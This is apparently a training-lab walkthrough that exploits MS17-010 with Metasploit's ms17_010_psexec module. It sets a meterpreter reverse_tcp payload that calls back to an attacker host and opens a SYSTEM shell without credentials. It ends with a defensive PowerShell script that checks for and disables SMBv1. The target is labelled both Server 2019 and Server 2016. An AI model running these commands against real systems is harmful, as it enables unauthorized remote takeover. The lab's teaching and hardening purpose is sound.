- Metasploit Framework
- Workstation (Windows 10)
- TargetWindows01 (Windows Server 2019)
- Kali (Linux)
From the TargetWindows01 taskbar, Start button > type winver > press Enter to open the About Windows dialog box:
Go to https://cve.mitre.org/ > search for Windows 1607 remote code execution > look for CVE-2017-0143 in the list:
Now look up the vendor bulletin: search for microsoft bulletin ms17-010 > open the first Microsoft blog post:
Go to https://www.rapid7.com/db/ > search ms17-010 > open the first result:
Go to Kali > Log in > open Terminal:
Type msfconsole and press Enter.
After the prompt appears, type: use exploit/windows/smb/ms17_010_psexec
Type: set rhosts 172.30.0.3 > press Enter
This command sets the remote host we want to exploit. In this example, it is Windows Server 2016.
Type: set payload windows/meterpreter/reverse_tcp > press Enter
This command selects the payload, which is executed right after successful exploitation.
Type: set lhost 172.30.0.4 > press Enter
This command specifies the local IP address on the attacker's computer that will listen for the incoming connection.
Type: set lport 443 > press Enter
This command sets the local port on the attacker's computer that will listen for the incoming connection. After the exploit runs, the payload makes Windows Server 2016 connect back to the attacker's machine on this port.
Type: exploit > press Enter
This command runs the exploit module against the target system.
Type: shell > press Enter
This command gives us cmd.exe over the Meterpreter session, meaning that we have now opened a remote shell on TargetWindows01 as the SYSTEM account. Note that no username or password was needed to do this.
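As an added hardening check for the server side of this lab (not part of the lab text or of Metasploit), the following PowerShell script reports whether the SMBv1 server protocol, the component MS17-010 targets, is still enabled on TargetWindows01, and optionally disables it. It assumes an elevated PowerShell session on Windows Server 2016/2019 or Windows 10, where the SmbShare and DISM modules are built in; the function and parameter names are my own.

```powershell
# Added hardening check for the MS17-010 lab above; not from the lab or from Metasploit.
# Run elevated on the Windows server. Reports SMBv1 status and, with -Disable, turns it off.
# Note: this does not confirm the MS17-010 patch itself is installed; check Windows Update for that.
[CmdletBinding(SupportsShouldProcess = $true)]
param(
    [switch]$Disable   # when set, disable SMBv1 instead of only reporting
)

function Get-Smb1Status {
    # Server-side SMBv1 switch exposed by the SMB server configuration
    $serverEnabled = (Get-SmbServerConfiguration).EnableSMB1Protocol
    # Windows optional feature that installs the SMBv1 driver and client
    $feature = Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
    [pscustomobject]@{
        ComputerName      = $env:COMPUTERNAME
        Smb1ServerEnabled = $serverEnabled
        Smb1FeatureState  = $feature.State
        # SMBv1 reachable over TCP/445 is the precondition the lab's exploit relies on
        Smb1Exposed       = ($serverEnabled -eq $true) -or ($feature.State -eq 'Enabled')
    }
}

$status = Get-Smb1Status
$status | Format-List

if ($Disable -and $status.Smb1Exposed) {
    if ($PSCmdlet.ShouldProcess($env:COMPUTERNAME, 'Disable SMBv1 server protocol and feature')) {
        # Stop the SMB server from speaking SMBv1 immediately
        Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
        # Remove the SMBv1 component; takes full effect after a reboot
        Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart | Out-Null
        Write-Host 'SMBv1 disabled. Reboot to finish removing the feature, then re-run this check.'
    }
}
```

Run it once without -Disable to see the current state; re-running the Metasploit steps above after SMBv1 is off and the patch is applied is a straightforward way to confirm the lab exploit no longer succeeds.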